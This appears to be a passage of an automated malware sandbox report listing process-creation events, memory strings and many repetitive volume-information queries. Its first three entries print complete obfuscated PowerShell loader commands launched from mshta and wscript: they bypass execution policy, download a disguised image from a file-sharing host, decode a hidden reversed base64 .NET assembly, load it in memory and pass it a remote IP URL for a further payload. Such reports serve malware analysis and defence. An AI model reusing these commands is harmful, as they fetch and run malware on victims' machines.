                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhvy0vsn21mywmgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicatbwvnymvszevgaw5pvelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxnt04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbkbkhytg8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagamxxtwh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiewsdwludcagicagicagicagicagicagicagicagicagicagicagifved1jcwentleludfb0ciagicagicagicagicagicagicagicagicagicagicagihffs3zxktsnicagicagicagicagicagicagicagicagicagicagicaglw5bbuugicagicagicagicagicagicagicagicagicagicagicaizhpuayigicagicagicagicagicagicagicagicagicagicagicattmfnzvnqqunficagicagicagicagicagicagicagicagicagicagicagbhhzqnrttvb2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicryb2nfujdtzmfjojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzgvntmvc2vlbxlizxn0bmv0d29ya3doawnoz2l2zwjlc3r0agluz3nlbnrpcmvsawzld2l0ag1llnrjriisiirftny6qvbqrefuqvxzzwvtewjlc3ruzxr3b3jrd2hpy2hnaxzlymvzdhroaw5nc2vudglyzwxpzmv3axrolnziuyismcwwkttzvefydc1zbevfucgzkttjrvggicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxhnlzw15ymvzdg5ldhdvcmt3agljagdpdmvizxn0dghpbmdzzw50axjlbglmzxdpdggudmjtig=='+[char]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdzzvlpbwfnzvunkydybca9ifb1swh0jysndhbzjysnoicrjy8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbccrj2uvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3qnkydhcm5usunmrmhtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngyguhvjo3nlwxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xjysnzwjdbgllbnq7c2vzaw1hz2vcexrlcya9ihnlwxdlyknsawvujysndc5eb3dubg9hzerhdgeoc2vzaw1hz2vvcmwpo3nlwwltywcnkydlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkhnlwwltywdlqnl0jysnzxmpo3nlwxn0yxj0rmxhzya9ifb1stw8qkftrty0xycrj1nuqvjupj5qduk7c2vzzw5kricrj2xhzya9ifb1sscrjzw8qkftrty0x0vord4+uhvjo3nlwxn0yxj0sw5kzxggpsbzzvlpbwfnzvrlehqusw5kzxhpzignkydzzvlzdgfydezsywcpo3nlwwvuzccrj0luzgv4id0gc2vzaw1hz2vuzxh0lkluzgv4t2yoc2vzzw5krmxhzyk7cycrj2vzc3rhcnrjbmrlecatz2ugmcatyw5kihnlwwvuzeluzgv4ic1ndcbzzvlzdgfydeluzgv4o3mnkydlwxn0yxj0sw5kzxggkz0gc2vzc3rhcnrgbgfnlkxlbmd0adtzzvliyxnlnjrmzw5ndgggpsbzzvllbmrjbmrlecatihnlwxn0yxj0sw5kzxg7c2vzymfzzty0q29tbwfuzca9jysnihnljysnwwltywcnkydlvccrj2v4dc5tdwjzdhjpbmcoc2vzc3rhcnrjbmrlecwnkycgc2vzymfzzty0tgvuz3rokttzzvliyxnlnjrszxzlcnnlzca9ic1qb2luichzzvliyxnlnjrdb21tyw5kjysnllrvq2hhckfycmf5kckgmnbpiezvckunkydhy2gtt2jqzwn0ihsgc2vzxyb9kvstms4ulshzzvknkydiyxnlnjrdb21tyw5klkxlbmd0acldo3nlwscrj2nvbw1hbmrcexrlcya9ifttexn0zw0uqycrj29udmvydf06okzyb21cyxnlnjrtdhjpbmcojysnc2vzymfzzty0umv2zxjzzwqpo3nlwscrj2xvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzsjysnzwn0aw9ulkfzc2vtymx5xscrjzo6tg9hzchzzvljb21tyw5kqnl0zxmpo3nlwxzhau1ldghvzca9ifsnkydkbmxpyi5jty5ib21lxs5hzxrnzxrob2qouhvjvkfjuhvjkttzzvl2ywlnzscrj3rob2qusw52bycrj2tlkhnlww51bgwsieaouhvjdhh0llrhukzgulcvmzuvodcxljq0lji3ms43mdevlycrjzpwdhrouhvjlcbqdulkzxnhdgl2ywrvuhvjlcbqdulkjysnzxnhdgl2ywrvuhvjlcbqdscrj0lkzxnhdgl2ywrvuhvjlcbqdulhc3buzxrfy29tcglsjysnzxjqduksifb1swrlc2f0axzhzg9qduksiccrj1b1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkbycrj1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkb1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1stfqduksuhvjzgvzyxrpdmfkb1b1sskpoycplnjfugxhq0uoj1b1sscsw1n0cklur11bq0hbul0zoskuckvqbgfdrsgnmnbpjywnfccplnjfugxhq0uoj3nlwscsjyqnkxwgliaokgdwiccqtwrykicplm5bbuvbmywxmswyxs1qt0lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('seyimageu'+'rl = puiht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvst'+'grnticffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f pui;seywebclient = new-object system.net.w'+'ebclient;seyimagebytes = seywebclien'+'t.downloaddata(seyimageurl);seyimag'+'etext = [system.text.encoding]::utf8.getstring(seyimagebyt'+'es);seystartflag = pui<<base64_'+'start>>pui;seyendf'+'lag = pui'+'<<base64_end>>pui;seystartindex = seyimagetext.indexof('+'seystartflag);seyend'+'index = seyimagetext.indexof(seyendflag);s'+'eystartindex -ge 0 -and seyendindex -gt seystartindex;s'+'eystartindex += seystartflag.length;seybase64length = seyendindex - seystartindex;seybase64command ='+' se'+'yimag'+'et'+'ext.substring(seystartindex,'+' seybase64length);seybase64reversed = -join (seybase64command'+'.tochararray() 2po fore'+'ach-object { sey_ })[-1..-(sey'+'base64command.length)];sey'+'commandbytes = [system.c'+'onvert]::frombase64string('+'seybase64reversed);sey'+'loadedassembly = [system.refl'+'ection.assembly]'+'::load(seycommandbytes);seyvaimethod = ['+'dnlib.io.home].getmethod(puivaipui);seyvaime'+'thod.invo'+'ke(seynull, @(puitxt.tgrffrw/35/871.44.271.701//'+':ptthpui, puidesativadopui, puid'+'esativadopui, pu'+'idesativadopui, puiaspnet_compil'+'erpui, puidesativadopui, '+'puidesativadopui,puidesativado'+'pui,puidesativadopui,puidesativadopui,puidesativadopui,puidesativadopui,pui1pui,puidesativadopui));').replace('pui',[string][char]39).replace('2po','|').replace('sey','$')| . ((gv '*mdr*').name[3,11,2]-join'')"Jump to behavior
                Source: explorer.exe, 0000000E.00000002.3013696891.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3009746571.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147438280.0000000004CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 0000000E.00000002.3009746571.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2144792039.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 0000000E.00000000.2144420450.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3007948093.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                Source: explorer.exe, 0000000E.00000002.3009746571.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2144792039.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 0000000E.00000002.3009746571.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2144792039.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02DB55EB cpuid 17_2_02DB55EB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
